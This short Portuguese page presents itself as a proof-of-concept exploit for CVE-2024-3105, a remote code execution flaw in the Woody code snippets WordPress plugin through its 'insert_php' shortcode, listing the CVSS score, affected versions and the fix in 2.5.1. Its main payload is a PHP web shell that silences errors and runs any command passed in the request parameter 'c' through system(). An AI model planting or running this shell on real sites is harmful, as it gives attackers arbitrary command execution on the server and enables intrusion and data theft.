
Um PoC Exploit para CVE-2024-3105 - O plugin Woody code snippets – Insert Header Footer Code, AdSense Ads para WordPress Remote Code Execution (RCE)
O plugin Woody code snippets – Insert Header Footer Code, AdSense Ads para WordPress é vulnerável a Execução Remota de Código em todas as versões até (e incluindo) 2.5.0 através do shortcode 'insert_php'. Isso se deve ao fato do plugin não restringir o uso da funcionalidade a usuários autorizados de alto nível. Isso possibilita que atacantes autenticados, com acesso de nível contribuidor ou superior, executem código no servidor.
Pontuação Base: 9.9 CRÍTICO
Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Tipo de Software: Plugin
Slug do Software: insert-php
Correção: Atualizar para a versão 2.5.1, ou uma versão corrigida mais recente
Versão Afetada: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>